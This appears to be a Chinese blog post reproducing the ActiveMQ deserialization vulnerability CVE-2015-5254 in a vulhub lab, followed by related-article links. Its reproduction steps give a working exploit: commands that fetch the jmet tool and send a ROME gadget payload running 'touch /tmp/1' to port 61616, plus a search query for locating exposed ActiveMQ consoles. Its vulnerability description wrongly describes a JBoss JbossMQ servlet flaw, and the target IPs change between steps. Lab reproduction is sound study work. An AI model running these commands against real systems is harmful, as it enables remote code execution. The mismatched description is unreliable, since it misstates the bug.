【漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)

Nx01 产品简介

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。

Nx02 漏洞描述

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

Nx03 产品主页

hunter-query: web.title="Apache ActiveMQ"

Nx04 漏洞复现

1.vulhub启动靶场。

2.kali中执行以下命令。

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/1" -Yp ROME 192.168.239.129 61616

3.此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过下面的URL看到这个队列中所有消息http://192.168.13.132:8161/admin/browse.jsp?JMSDestination=event

4.点击此条队列详细进行触发。

5.查看容器sudo docker-compose exec activemq bash,/tmp/1已成功创建成功。

Nx05 修复建议

Apache升级activemq5.13.0。

相关推荐
sky_feiyu8 小时前
HTTP超文本协议
网络·网络协议·web安全·http
44漏洞观察员10 小时前
windows实战-wordpress——玄机靶场
服务器·windows·web安全·网络安全·安全威胁分析
网络安全-老纪11 小时前
CHIMA网络安全攻防大赛经验分享
安全·web安全
网安墨雨11 小时前
网络安全笔记
网络·笔记·web安全
44漏洞观察员12 小时前
linux实战-黑链——玄机靶场
linux·运维·服务器·web安全·网络安全
hackeroink15 小时前
想自学成黑客(白帽子),零基础小白如何自学黑客(网络安全)?
网络·安全·web安全·网络安全·黑客·编程·黑客技术
网络安全指导员15 小时前
网络安全 -综合渗透实验
安全·web安全
网络安全工程师老王15 小时前
关于OpenRASP的绕过实现
web安全·网络安全·信息安全
Yimuzhizi16 小时前
《企业网络安全架构与实战指南:从蓝队防御到零信任网络部署》
网络·人工智能·安全·web安全·搜索引擎·网络安全·架构
网安_秋刀鱼19 小时前
API安全
web安全·网络安全·1024程序员节